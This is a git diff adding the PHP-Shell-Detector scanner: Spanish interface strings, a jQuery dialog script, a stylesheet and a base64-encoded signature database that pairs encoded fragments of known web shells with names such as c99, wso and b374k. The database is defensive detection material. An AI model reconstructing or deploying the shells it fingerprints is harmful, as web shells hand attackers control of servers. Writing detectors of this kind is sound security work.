code submited. Thank you.'] = 'Su codigo a sido enviado, Gracias'; + $local['Cant find selected file.'] = 'No se puede encontrar el archivo seleccionado.'; + $local['No file specified.'] = 'No a seleccionado el archivo.'; + $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Iniciando scan, por favor sea paciente, esto tomara un tiempo'; + $local['Number of known shells in database is: '] = 'La cantidad de shells en la base de datos es de:'; + $local['Files found:'] = 'Archivos encontrados:'; + $local['File limit reached, scanning process stopped.'] = 'El limite de archivos fue alcanzado, El scan a terminado'; + $local['File scan done, we have: @count files to analize'] = 'El scan a finalizado, Tenemos: @count de archivos para analizar'; + $local['Please note suspicious files information will not be displayed'] = 'Tome en cuenta que archivos sospechosos no seran mostrados'; + $local['Show sha for file:'] = 'Display sha por archivo:'; + $local['Full path:'] = 'Ruta:'; + $local['Sha1:'] = 'Sha1:'; + $local['please note it`s a malicious file not a shell'] = 'Tome en cuenta que un archivo sospechoso, no una shell'; + $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Tome en cuenta que un archivo peligroso (Archivo legitimo, pero puede ser usado por hackers) '; + $local['Fingerprint:'] = 'Fingerprint:'; + $local['Positive, it`s a '] = 'Positivo, es un '; + $local['suspicious functions used:'] = 'function sospechosa:'; + $local['line:'] = 'Linea:'; + $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Estado</strong>: @count Archivos sospechosos encontrados @shells shells'; + $local['Negative'] = 'Negativo'; + $local['if wrong'] = 'Incorrecto'; + $local['submit file for analize'] = 'Enviar archivo para analizar'; + $local['Submit file'] = 'Enviar archivo'; + $local['Your email'] = 'Tu Email'; + $local['(in case you want to be notified):'] = '(En canso que quieras ser notificado):'; + $local['Suspicious behavior found in:'] = 'Comportamiento sospechoso encontrado en:'; + $local['Please note: file have different owner'] = 'Tenga encuenta que el archivo tiene un propietario diferente'; + $local['Please note: file have full access permissions'] = 'Tenga en cuenta que el archivo tiene todos los permisos'; + $local['Owner:'] = 'Propietario:'; + $local['Permission:'] = 'Pemisos:'; + $local['Last accessed:'] = 'Ultimo accesso:'; + $local['Last modified:'] = 'Ultima modificacion:'; + $local['MD5 hash:'] = 'MD5 hash:'; + $local['Filesize:'] = 'Tamaño de archivo:'; + $local['Please wait'] = 'Por favor espere...'; + $local['Done, report file created'] = 'Finalizado,El reporte a sido creado'; + $local['Error, report file creation failed'] = 'Error,el reporte no a sido creado'; + $local['<strong>Error: </strong>'] = '<strong>Error:</strong>'; + $local[' line: '] = 'Linea:'; +?> diff --git a/doc/PHP-Shell-Detector-master/media/script.js b/doc/PHP-Shell-Detector-master/media/script.js new file mode 100644 index 0000000000000000000000000000000000000000..76c500c40c2d41967c880a115922825ef4f50806 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/media/script.js @@ -0,0 +1,56 @@ +function init() { + $("#loader").hide(); + $("dt").live('click', function() { + var text = $(this).children(".plus"); + if (text.length) { + $(this).next("dd").slideToggle(); + if (text.text() == "+") { + text.text("-"); + } + else { + text.text("+"); + } + } + }); + $(".showline").live('click', function() { + var id = "li"+$(this).attr("id"); + $( "#"+ id).dialog({height: 440,modal: true, width: 600, title: "Source code"}); + return false; + }); + $(".source_submit").live('click', function() { + var id = "for" + $(this).attr("id"); + $("#wrap" + id).dialog({ + autoOpen: false, + height: 200, + width: 550, + modal: true, + resizable: false, + title: "File submission", + buttons: { + "Submit file to Websecure": function() { + if ($(".ui-dialog-content form").length) { + $("#i"+id).removeClass("hidden"); + $("#"+id).submit(); + $(".ui-dialog-content form").remove(); + } else { + alert("This file already submited"); + } + }, + "Submit file to Virustotal": function () { + alert(1); + } + } + }); + $("#wrap" + id).dialog("open"); + return false; + }); + + /*$(".source_submit").click(function() { + var id = "for" + $(this).attr("id"); + $("#"+id).submit(); + $(this).parent().remove(); + $("#i"+id).removeClass("hidden"); + return false; + })*/ +} +$(document).ready(init); diff --git a/doc/PHP-Shell-Detector-master/media/style.css b/doc/PHP-Shell-Detector-master/media/style.css new file mode 100644 index 0000000000000000000000000000000000000000..50faac2a2c61f5df12564629962ba36790082621 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/media/style.css @@ -0,0 +1,261 @@ +body { + background-color:#ccc; + font:13px tahoma,arial; + color:#151515; + direction:ltr; +} +h1 { + text-align:center; + font-size:24px; +} +dl { + margin:0px; + padding:0px; +} +#content { + width:1024px; + margin:0px auto; + padding:35px 40px; + border:1px solid #e8e8e8; + background:#fff; + overflow:hidden; + -webkit-border-radius:7px; + -moz-border-radius:7px; + border-radius:7px; +} +dl dt { + cursor:pointer; + background:#5f9be3; + color:#fff; + float:left; + font-weight:700; + margin-right:10px; + width:99%; + position:relative; + padding:5px +} +dl dt .plus { + position:absolute; + right:4px +} +dl dd { + margin:2px 0; + padding:5px 0 +} +dl dd dl { + margin-top:24px; + margin-left:60px +} +dl dd dl dt { + background:#4FCBA3!important; + width:180px!important +} +.error { + background-color:#FFEBE8; + border:1px solid #DD3C10; + padding:4px 10px; + margin:5px 0px; +} +.success { + background-color:#fff; + border:1px solid #bdc7d8; + padding:4px 10px; + margin:5px 0px; +} +.info { + background-color:#fff9d7; + border:1px solid #e2c822; + padding:4px 10px; + margin:5px 0px; +} +.clearer { + clear:both; + height:0px; + font-size: 0px; +} +.hidden { + display:none; +} +.green { + font-weight: bold; + color: #92B901; +} +.red { + font-weight: bold; + color: #DD3C10; +} +.orange { + font-weight: bold; + color: #DD3C10; +} +.green small { + font-weight: normal !important; + color: #151515 !important; +} +.filesfound { + position: relative; +} +.files { + position: absolute; + left:4px; + background-color:#FFF9D7; +} +iframe { + border:0px; + height: 24px; + width: 100%; +} +.small { + font-size: 10px; + font-weight:normal; +} +.ui-widget-content dl dd dl { + margin-left: 0px !important; +} +.ui-widget-content input { + width: 310px; + margin-top: 4px; +} +#loader { + position: fixed; + top: 25%; + bottom: 0%; + left: 45%; + z-index: 99; + display: block; + text-align: center; + width: 100%; + padding-top: 125px; + text-align: left; + font-weight: bold; + text-transform: uppercase; + text-indent: -20px; + font-size: 24px; + color: #5F9BE3; +} +#circularG { + position:relative; + width:128px; + height:128px +} +.circularG { + position:absolute; + background-color:#5F9BE3; + width:29px; + height:29px; + -webkit-border-radius:19px; + -moz-border-radius:19px; + -webkit-animation-name:bounce_circularG; + -webkit-animation-duration:1.04s; + -webkit-animation-iteration-count:infinite; + -webkit-animation-direction:linear; + -moz-animation-name:bounce_circularG; + -moz-animation-duration:1.04s; + -moz-animation-iteration-count:infinite; + -moz-animation-direction:linear; + border-radius:19px; + -o-animation-name:bounce_circularG; + -o-animation-duration:1.04s; + -o-animation-iteration-count:infinite; + -o-animation-direction:linear; + -ms-animation-name:bounce_circularG; + -ms-animation-duration:1.04s; + -ms-animation-iteration-count:infinite; + -ms-animation-direction:linear; +} +#circularG_1 { + left:0; + top:50px; + -webkit-animation-delay:0.39s; + -moz-animation-delay:0.39s; + -o-animation-delay:0.39s; + -ms-animation-delay:0.39s; +} +#circularG_2 { + left:14px; + top:14px; + -webkit-animation-delay:0.52s; + -moz-animation-delay:0.52s; + -o-animation-delay:0.52s; + -ms-animation-delay:0.52s; +} +#circularG_3 { + top:0; + left:50px; + -webkit-animation-delay:0.65s; + -moz-animation-delay:0.65s; + -o-animation-delay:0.65s; + -ms-animation-delay:0.65s; +} +#circularG_4 { + right:14px; + top:14px; + -webkit-animation-delay:0.78s; + -moz-animation-delay:0.78s; + -o-animation-delay:0.78s; + -ms-animation-delay:0.78s; +} +#circularG_5 { + right:0; + top:50px; + -webkit-animation-delay:0.9099999999999999s; + -moz-animation-delay:0.9099999999999999s; + -o-animation-delay:0.9099999999999999s; + -ms-animation-delay:0.9099999999999999s; +} +#circularG_6 { + right:14px; + bottom:14px; + -webkit-animation-delay:1.04s; + -moz-animation-delay:1.04s; + -o-animation-delay:1.04s; + -ms-animation-delay:1.04s; +} +#circularG_7 { + left:50px; + bottom:0; + -webkit-animation-delay:1.1700000000000002s; + -moz-animation-delay:1.1700000000000002s; + -o-animation-delay:1.1700000000000002s; + -ms-animation-delay:1.1700000000000002s; +} +#circularG_8 { + left:14px; + bottom:14px; + -webkit-animation-delay:1.3s; + -moz-animation-delay:1.3s; + -o-animation-delay:1.3s; + -ms-animation-delay:1.3s; +} +@-webkit-keyframes bounce_circularG { + 0% { + -webkit-transform:scale(1) + } + 100% { + -webkit-transform:scale(.3) + } +} +@-moz-keyframes bounce_circularG { + 0% { + -moz-transform:scale(1) + } + 100% { + -moz-transform:scale(.3) + } +} +@-o-keyframes bounce_circularG { + 0% { + -o-transform:scale(1) + } + 100% { + -o-transform:scale(.3) + } +} +@-ms-keyframes bounce_circularG { + 0% { + -ms-transform:scale(1) + } + 100% { + -ms-transform:scale(.3) + } +} \ No newline at end of file diff --git a/doc/PHP-Shell-Detector-master/shelldetect.db b/doc/PHP-Shell-Detector-master/shelldetect.db new file mode 100755 index 0000000000000000000000000000000000000000..8e3d5015188f44606d07bfc9fabc7ff4f34900c4 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/shelldetect.db @@ -0,0 +1,1065 @@ +YTo2MDQ6e3M6NjQ6IlhScGJ5QXFJQzQzTlNrN0RRb05DaUFnSUNCbWIzSWdLQ1JwSUQwZ01Ec2dK +R2tnUENBa2JXSmZiR1Z1WjNSb08iO3M6MjE6InBocGVtYWlsZXJbMF1bMl1bcGhwXSI7czo2NDoi +T3drSkNRb0tDV1JsWm1GMWJIUTZDZ2tKYzJodmQxOXNjeWdwT3dwOUNncG1kVzVqZEdsdmJpQnph +RzkzWDJ4eiI7czoxNToiY21kWzMxXVswXVtwaHBdIjtzOjY0OiJaZGtvNVRUTlVSM0pJTDJSdlYw +TTBXRzFCUld0WlZuZEJRMVZRVVdRd1IydzBOM1ZFYWxJaUxDSmpNa2R5YlZSIjtzOjE3OiJub25h +bWVbMV1bMF1bcGhwXSI7czo2NDoiMmh2SUNJTkNna0pDUWtOQ2drSklDQWdJQWs4ZEhJK0RRb0pD +UWtnSUNBZ0lDQThkR1FnZDJsa2RHZzlKekV3SiI7czoyMjoiaGlkZGVuc2hlbGxbMF1bMF1bcGhw +XSI7czo2NDoiY205c09pQnVieTFqWVdOb1pWeHVJanNOQ25CeWFXNTBJQ0pEYjI1MFpXNTBMWFI1 +Y0dVNklIUmxlSFF2YUhSdCI7czoxNDoiY21kWzI0XVswXVtwbF0iO3M6NjQ6Ikp5UGdvZ0lDQWdJ +Q0FnSUR4aWNpQXZQanhpY2lBdlBpQThMMlp2Ym5RK0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnUEQiO3M6 +MTk6InM3MnNoZWxsWzBdWzBdW3BocF0iO3M6MTI2OiJHUmxabUYxYkhSZmRYTmxYMkZxWVhnZ1BT +QjBjblZsT3lBa1pHVm1ZWFZzZEY5amFHRnljMlYwSUQwZ0oxZHBibVJ2ZDNNdE1USTFNU2M3SUds +bUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTUiO3M6MjU6ImNvY2Fj +b2xhX3NoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBFWlBVazBnUlU1RFZGbFFSVDBpYlhWc2RHbHdZ +WEowTDJadmNtMHRaR0YwWVNJZ1FVTlVTVTlPUFNKMWNHeHYiO3M6MjY6InNoZWxsX3VwbG9hZGVy +WzEwXVswXVtwaHBdIjtzOjY0OiJXRnlaMmx1TFd4bFpuUTZOWEI0T3lCdFlYSm5hVzR0Y21sbmFI +UTZOWEI0T3ljK2JHOW5hVzQ2UEM5emNHRnVQIjtzOjE0OiJjaWhbMF1bMF1bcGhwXSI7czo2NDoi +WmlrdUlpa2hQQzlpUGp3dlkyVnVkR1Z5UGlJN2ZRMEtJQ0JsYkhObElIdGxZMmh2SUNJOFkyVnVk +R1Z5UGp4aSI7czoxNToiYzk5WzI2XVswXVtwaHBdIjtzOjY0OiJoYldVb0tTNGlYRzRpT3cwS1B6 +NE5DanhvY2o0OEwzQnlaVDROQ2lBZ0lDQThkR0ZpYkdVK1BHWnZjbTBnYldWIjtzOjIwOiJsYW1h +c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRlVsc25Va1ZOVDFSRlgwRkVSRkluWFR0bFkyaHZJQ0ln +YzJsNlpUMHhOejQ4TDNSa1Bqd3ZkSEkrUEhSeVBqeCI7czoxNzoiamFja2FsWzFdWzBdW3BocF0i +O3M6NjQ6IkNna0pDV0Z5Y21GNVgzQnZjQ2drWlhoNEtUc05DZzBLQ1FrSlB6NE5DZzBLQ1FrSlJH +bHlaV04wYjNKNUlFTnYiO3M6MTc6ImNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJhekUxTUM1a1pT +OTNMMlJrSWlrN0lBMEtjM2x6ZEdWdEtDSmphRzF2WkNBM056Y2daR1FpS1RzZ0RRcHplWE4wIjtz +OjE3OiJ0cm95YW5bMF1bMF1bcGhwXSI7czo2NDoiUVowbFNObkpXVUZkdFJqRmFWbXRtZUhKQkx6 +UkhVMUV5SzNaSFoyTkdXVmRhZUZaaWRVbHhZMHcwTWxOTlNUSiI7czoxNzoiYjM3NGtbMTNdWzBd +W3BocF0iO3M6NjQ6ImxkR012YUhSMGNHUXVZMjl1WmcwS0wyVjBZeTl3ZFhKbExXWjBjR1F1WTI5 +dVpnMEtMMlYwWXk5d2RYSmxMV1oiO3M6MjA6InBocHNoZWxsWzMyXVswXVtwaHBdIjtzOjY0OiJM +VlVuTENBblkzQTROalluS1RzS0NTUnZjSFJmWTJoaGNuTmxkSE1nUFNBbkp6c0tDV1p2Y21WaFky +Z29KR05vIjtzOjE5OiJmaWxlc21hbls5XVswXVtwaHBdIjtzOjY0OiJPblIvVlVBalFDWmtOMlFp +SzJReVMzZ3ZmeUJKZjA1clRXNWVXU3hLTkZsUGQyd21TbWhCYUdNdldDZ3JMbEp4IjtzOjIwOiJj +eWJlcnNweTVbMF1bMF1bYXNwXSI7czo2NDoiRmpkR2x2YmowbmFIUjBjRG92TDNkM2R5NW9ZWE5v +WTJobFkydGxjaTVrWlM5b1lYTm9MbU5uYVQ4bk8yUnZZMyI7czoyMDoiZmlsZXNtYW5bMTRdWzBd +W3BocF0iO3M6NjQ6IjVRVlZRZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOUoxSjFiaWMrRFFvOEww +WlBVazArRFFvTkNqd2xRQ0J3WVciO3M6MTU6ImNtZFsxOF1bMF1banNwXSI7czo2NDoieWNXMUNj +RmRGZDNWUmJVVXhNMEUzYmxkWlJXSk5TMWRXTlc0MmNqQmxOQ3Q2YUdSNlVqY3JlRUZUZWtKa1RI +ZCI7czoyMDoicGhwc2hlbGxbMzNdWzBdW3BocF0iO3M6NTk6IlBHRWdhSEpsWmowaWFIUjBjRG92 +TDNkM2R5NXdiMnhwYzJodVpYZHpMbU52YlM5cGJtUmxlQzV3YUhBIjtzOjI0OiJzcGFtX3RydXN0 +YXBwWzBdWzFdW3BocF0iO3M6NjQ6IlpYTWdQVHhKVGtaUFBpQTdDbU5zYjNObEtFbE9SazhwT3dw +emVYTjBaVzBvUUd4cGJtVnpLVHNLY0hKcGJuUW4iO3M6MjQ6ImFyYWJfYmxhY2tfaGF0WzBdWzBd +W3BsXSI7czo2NDoiSUR3dmRHRmliR1UrRFFvZ0lDQWdJQ0FnSUEwS0RRb25PeUFOQ2cwS1B6NE5D +anhpYjJSNUlHSm5ZMjlzYjNJOSI7czoyMDoiaW5kaXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBE +OVFTRkFLSkdacGJHVWdQU0JtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMMmhoWTJ0 +bGNteGgiO3M6MTk6InNhdmVmaWxlWzBdWzBdW3BocF0iO3M6NjQ6InljM1JoZEhWeklpazdJQTBL +SUNBa2MzRnNjWFZwWTJ0c1lYVnVZMmhiWFNBOUlHRnljbUY1S0NKVFpYSjJaWEkiO3M6MTk6Imdu +eXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6ImNHRnVQand2Wm05dWRENDhabTl1ZENCamIyeHZjajBp +SXpGRU1VUXhSQ0lnWm1GalpUMGlWR0ZvYjIxaElpQnoiO3M6MTk6ImhhY2tlcnBzWzBdWzBdW3Bo +cF0iO3M6NjQ6Im1kMGFEb2dJaUF1SUhOMGNteGxiaWdrZEdocGN5MCtZWEpqYUdsMlpTa3BPdzBL +SUNBZ0lDQWdJQ0JvWldGa1oiO3M6MjU6InBocGZpbGVtYW5hZ2VyWzJdWzJdW3BocF0iO3M6NjQ6 +IkhneU1HWmNlREl6WEhneE4xeDRNREZRWEhneE16RmNlREJrTkdaY2VETmxTMXg0TUdNd1dGeDRN +VFZjZURFeVgiO3M6MjI6Impvb21sYV9zcGFtWzFdWzFdW3BocF0iO3M6NjQ6ImZVa1ZSVlVWVFZG +c25kWE5sY2lkZEtTay9KRjlTUlZGVlJWTlVXeWQxYzJWeUoxMDZJaUk3RFFwcFppZ2habWwiO3M6 +MTc6ImphY2thbFswXVswXVtwaHBdIjtzOjY0OiIwTGtadmNtMG9JbTF2WkdVaUtTa0taWGhwZENC +emRXSUtaVzVrSUdsbUNtVnVaQ0JwWmdvS1NIUnRiRWhsWVdSIjtzOjIyOiJlbG1hbGlzZWtlclsw +XVswXVthc3BdIjtzOjY0OiJiMk5yWlhRc0lDSlFVa2xXVFZOSElDUndjbWx1ZEd3Z09pQk9iV0Z3 +SUZCdmNuUlRZMkZ1SURFeU9pNGdOSHdnIjtzOjE3OiJpcmNfYm90WzBdWzBdW3BsXSI7czo2NDoi +SUNBZ0lDQWdJQ0JsWTJodklDSThjSEpsUGlJN0NpQWdJQ0FnSUNBZ0pHTnRaQ0E5SUNna1gxSkZV +VlZGVTFSYiI7czoxNDoiY21kWzRdWzBdW3BocF0iO3M6NjQ6IkJJSzBSWGExRTVNRlpxWVV0RGRW +bHhhbkJTUWs1alUzVlpNMjVZUkhaYVZEbGlTazl5TUZsaFFtMUhiWFJxUTIiO3M6MTk6InBocHNo +ZWxsWzJdWzBdW3BocF0iO3M6NjQ6IlpTQnBaRDBpZEdGaWJHVXlJaUJ6ZEhsc1pUMGlZbTl5WkdW +eUxXTnZiR3hoY0hObE9pQmpiMnhzWVhCelpUc2kiO3M6MTg6InRlYW1zcWxbMF1bMF1bcGhwXSI7 +czo2NDoiQ1IxY213Z0tRMEtDUWw3RFFvSkNRa2tWVkpNY0dOeklEMGdLQ0J3WVhKelpWOTFjbXdv +SUNSMWNtd2dLU0FwTyI7czoxNToicGJvdFsxXVswXVtwaHBdIjtzOjY0OiJQRDl3YUhBZ2FXWW9h +WE56WlhRb0pGOVNSVkZWUlZOVVd5SmpiMjF0Wlc1MElsMHBLU0I3SUdWMllXd29ZbUZ6IjtzOjE1 +OiJjbWRbMjNdWzBdW3BocF0iO3M6NjQ6Imw2WlFvZ0lDQWdJQ0FnSUhWcGJuUWdia1JsWm1GMWJI +UlVhVzFsVDNWMExBa0pDUWtKQ1M4dklIUnBiV1V0YjMiO3M6MjA6Imluc29tbmlhWzBdWzBdW2Fz +cHhdIjtzOjY0OiJZakk1Y21GWFZXOUpibHB3WXpKc01HTjVTWE5LU0Zwd1l6SnNNRmt5T1RGaWJs +RndUM2R2ZGt4NVFUTmhSRkoxIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi +QklZWFpsYm1GeVpDQXRMVDROQ2p3aExTMGdUVzlrYVdacFpXUWdkRzhnZDI5eWF5QjNhWFJvSURR +NE5ETndhSCI7czoxNToiY21kWzIxXVswXVtwaHBdIjtzOjY0OiI2WlQwaUlDWWdabWtyTXlBbUlD +SWdjM1I1YkdVOUlpSmlZV05yWjNKdmRXNWtMV052Ykc5eU9pQnlaMklvTkRnIjtzOjE3OiJhc3B5 +ZHJ2WzBdWzBdW3ZiXSI7czo2NDoiRlNZa295VG5SYVEyUmtVRlF3YVZwdVVuZFlNbHB3WWtkV1pt +UllRV2xMVTBGblNVaHpaMUZIV2pCalJqbDNaRiI7czoyMDoiOTUxMDc4YmlKWzBdWzBdW3BocF0i +O3M6NjQ6InRCUWxwNFFVaG1OazVKTVZSMlUyMDJiMFI0U2xvd1EyTTVibFpITlhCcWVHMDFXRGxh +UkdFeVVVTkZXR0VyVkUiO3M6MjA6InBocHNoZWxsWzE1XVswXVtwaHBdIjtzOjY0OiJDQmpiMnh2 +Y2oxbmNtVmxiajRrWkM4a1pHVnNYMllnUkVWTVJWUkZSQ0U4TDJadmJuUStQQzlpUGcwS1BHSnlQ +IjtzOjE4OiJuc3R2aWV3WzBdWzBdW3BocF0iO3M6NjQ6Ilcxd0xuTnhiQ0lwT3cwS0lDQWdJQ0Fn +SUNCb1pXRmtaWElvSWtOdmJuUmxiblF0Vkhsd1pUb2dkR1Y0ZEM5d2IiO3M6MjA6ImZpbGVzbWFu +WzEyXVswXVtwaHBdIjtzOjY0OiJ0TFMwdExTMHRMUzB0TFMwdExTMHRMUXB6ZFdJZ1JHOTNibXh2 +WVdSR2FXeGxDbnNLQ1NNZ2FXWWdibThnWm1sIjtzOjIwOiJ1bml0eHNoZWxsWzBdWzBdW3BsXSI7 +czo2NDoiWkhZWEpRWm5KbE9YQTVLMmhSVm5WTlZUTjFWbWgyTkdWVU56SnlVa2xMU1hwTkwxTkll +RVk0ZVRkc1F6bExaVCI7czoxNzoicGhwc3B5WzJdWzBdW3BocF0iO3M6NjQ6IkFnSUR3dmRISStE +UW9nSUNBZ0lDQWdJRHd2ZEdGaWJHVStEUW9nSUNBZ0lDQWdJRHgwWlhoMFlYSmxZU0J1WVciO3M6 +MjM6ImFudGlzZWNzaGVsbFsyXVswXVtwaHBdIjtzOjU2OiJhSFIwY0Rvdkx6azFMakUyT0M0eE9U +RXVNVEUyTDBkbGRFeHBibXR6TG1GemFIZy9hRzl6ZEQwPSI7czoxOToiZ2V0bGlua3NbMF1bMV1b +cGhwXSI7czo2NDoiYVc0Z1hDSmJKVEpkWENJNlhHNWJKVEZkSWl3S0owdHZjSGxoYkdGZlptbHNa +WE1uSUQwK0lDZERiM0JwYnlCeCI7czoxOToiaW1oYXBmdHBbMF1bMF1bcGhwXSI7czo2NDoiNkwy +RndjSE5sY25ZdmQzZDNMM05vWld4c2N5OGlQZ29nSUNBZ0lDQWdJRHhtYjI1MElHTnZiRzl5UFNJ +alJFTiI7czoyMzoic3RyZXNzYnlwYXNzWzBdWzBdW3BocF0iO3M6NjQ6IjBnYzNwRFRVUXNJSE42 +VkdWdGNFWnBiR1VLQ2s5dUlFVnljbTl5SUZKbGMzVnRaU0JPWlhoMENnb25JQzB0SUciO3M6MTQ6 +ImNtZFsxXVswXVthc3BdIjtzOjY0OiI5dGJXRnVaRG9nUEdsdWNIVjBJRzVoYldVZ1BTQW5ZMjFr +Sno1Y2JpSTdEUW9nSUNBZ0lDQWdJQ0JsWTJodklDIjtzOjIwOiJkYXJrc2hlbGxbMF1bMF1bcGhw +XSI7czo3OiJ2ZXJzaW9uIjtzOjEwOiIxNDA1Njc0OTQ3IjtzOjY0OiJpY3ZjSFZpYkdsalgyaDBi +V3d2YVc1akwyTnZibVpwWnk1cGJtTXVjR2h3Snl3a2RYTmxjaTRuTFRNekxuUjRkIjtzOjIwOiJj +b25maWdzcHlbMV1bMF1bcGhwXSI7czo2NDoiVkRCTlJqaEVhM054Y1ZKalZsQnZUMUZrVW0xaGNX +YzNlRXh2ZUdNclMxRkxVSEUzTjNwNk9WQmllSGxXWWxkTSI7czoxNToiaXNrb1swXVswXVtwaHBd +IjtzOjY0OiJ0WlNnZ0pGOUdTVXhGVTFzbmRYQnNiMkZrWldSbWFXeGxKMTFiSjI1aGJXVW5YU2tn +YjNJZ1pHbGxLQ1JsY25KIjtzOjI1OiJwaHBmaWxlbWFuYWdlcls0XVswXVtwaHBdIjtzOjY0OiJJ +RzVoYldVOVhDSmZZMjFrWENJZ2RtRnNkV1U5WENJaUxpUmpkWEp5Wlc1MFEwMUVMaUpjSWo0OEwz +UmtQaUk3IjtzOjE2OiJ3b3JzZVswXVswXVtwaHBdIjtzOjY0OiJmWkhWdGNDazdDbVZzYzJVS2V3 +cHBaaWdoSkhSdlgyWnBiR1VwQ25zS2FHVmhaR1Z5S0NkRGIyNTBaVzUwTFZSIjtzOjE1OiJ6YWNv +WzBdWzBdW3BocF0iO3M6NjQ6Im5JZ0x6NGlPaWNuS1M0aVBDOTBaRDRpT3cwS0lDQWdmUTBLSUNB +Z0pITnhiR1J5TGowaVBDOTBjajVjYmlJN0QiO3M6MTY6Im15c3FsWzZdWzJdW3BocF0iO3M6NjQ6 +IlRHUkRlVXNOQ2xWUlJtdG9ZbUkyVHpoa00zUXlMek5xVWxSS0wwbHhVM2REUVVsclJWcEJSVE5p +TVdKQ2RUWTQiO3M6MjQ6InNlcnZlcl9jb25maWdbMF1bMF1bcGhwXSI7czo2NDoiUnNaVDROQ2lB +OGMzUjViR1UrRFFvZ0lDQjBaQ0I3RFFvZ0lDQm1iMjUwTFdaaGJXbHNlVG9nZG1WeVpHRnVZUyI7 +czoxODoiY3J5c3RhbFsyXVswXVtwaHBdIjtzOjY0OiJCak9UbHdhSEJwWTNFdWNHaHdJRDhnYUhS +MGNEb3ZMMk5qZEdWaGJTNXVkV3RzWlc5dUxuVnpEUW9qSXlNakl5IjtzOjE1OiJjOTlbMjldWzBd +W3BocF0iO3M6NjQ6ImdKeUFnUm1sc1pUb2dJQ0FnUTIxa1FYTndMbUZ6Y0EwS0lDQW5JQ0JCZFhS +b2IzSTZJQ0JOWVdObGJ5QThiV0YiO3M6MTU6ImNtZFsxNl1bMF1bYXNwXSI7czo2NDoiYVUxTlEy +RjZheTgxTjBGbGJuVjBiamRXVGxOa2FVRlVTWGxOTDNob2VrNTJZemt5WlRGMVJWZzJVMDkzTkhr +MCI7czoyNzoiYWhsaXN5dXJnYV9zaGVsbFswXVswXVtwaHBdIjtzOjY0OiI0a2MzUnlLVHNOQ2dr +SkNRa0pZbkpsWVdzN0RRb0pDUWtKWTJGelpTQW5iWGx6Y1d3bk9nMEtDUWtKQ1FseVpYIjtzOjE0 +OiJ3c29bMF1bMF1bcGhwXSI7czo2NDoiYVV0VFFuWmphVUo2WkVoS2NHTXpVbmxMUTFKNVdsZGFi +R050Vm5sTVEwb3pXbGRLYUdKSVVtaEphV3RuWWpOSiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTVd +WzBdW3BocF0iO3M6MTM1OiI1YjE5ZnhxMzBqRDhkL3dwNUMybkN3M0dnSk9jMURiRWlXTW5UaE03 +OVV1U0pzNU5GMWhnNjRXbHU0dXhtK1B2ZnMrTVhsYmFGOEJwejNYZHorOXhHeHVrMFdqME5ock5q +RWFsWHVBSElXc3g2NGYrNExHMXMxYnF1d05uNXNlZFdlUjJuRCsiO3M6MTQ6Indzb1s1XVswXVtw +aHBdIjtzOjY0OiJpOHZWVzUwZFdzZ2IzQjBhVzFoYkdsellYTnBJSFZyZFhKaGJpQmtZVzRnYTJW +alpYQmhkR0Z1TGdva2FXMW5aIjtzOjE4OiJiYXRhdmk0WzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNB +Z0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdSMWNESW9hVzV6 +YjIiO3M6MTk6ImJsaW5kc2hlbGxbMF1bMF1bY10iO3M6NjQ6ImJXVWdMbWgwY0dGemMzZGtJajRO +Q2drSlptbHVaQ0JoYkd3Z0xtaDBjR0Z6YzNka0lHWnBiR1Z6UEM5dmNIUnAiO3M6MTg6ImNyeXN0 +YWxbMV1bMF1bcGhwXSI7czo2NDoiRVJSYjBwRFVXdEtRMVJXYW1GRVNXZGhTRkowWWtoT2QwNVhU +VEJOVjNocVlVUkdlV041YUVGYWJra3hUVmRSYiI7czoxODoicjNsYXBzM1swXVswXVtwaHBdIjtz +OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSkhaMklEMGdabUZzYzJVN0NpQWdJQ0FnSUNBZ0lDQWdJQ0Fn +SUNBZ0lDQWdJQ0FnIjtzOjE5OiJ3M2RzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJsWUt5OXRjVVE0 +YjJGVmFsaHdiekJOVGswM1pWVXJNalk0UnpkV09GcDBVa1J1YUZweFNEUkNOR1ZMVTNRMFpGIjtz +OjE2OiJiMzc0a1s2XVswXVtwaHBdIjtzOjY0OiJWd3BsWVdnMFF6VkxkVWR0YUUweGJWZzBiSGhL +VWtvM1JERlNkM296VmxsdVJGQklZazVzV1hJNVZ5dHhRblpXIjtzOjE2OiJiMzc0a1s0XVswXVtw +aHBdIjtzOjY0OiJkQ0k3THk5bWIzSnRZWFJ2RFFva1NHRjRjR3h2Y21WeVgyRmtaSEk5SkhKbGJX +OTBaVjloWkdSeUxpSjBiMjlzIjtzOjI0OiJhbGJhbmlhbnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6 +InNnWlhocGREc2dmU0JsYkhObElIc05DZ2tKSm5SNWNHVW9KR05vWVc0c0pHSjFaeXdrWkc5eWF5 +d2lSR1ZOYjMiO3M6MTk6Imhvc3RkZXZpbFswXVswXVtwbF0iO3M6NjQ6ImhiSE5sS1NCN0RRb0pD +UWtKYVdZZ0tDUm1JQ0U5SUNjdUp5QW1KaUFrWmlBaFBTQW5MaTRuSUNZbUlDRmtaV3ciO3M6MjI6 +IjQyMDUzMnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IjFwY1hRcmVFUm1Tek5CVFRkeVlXMTVRa1pT 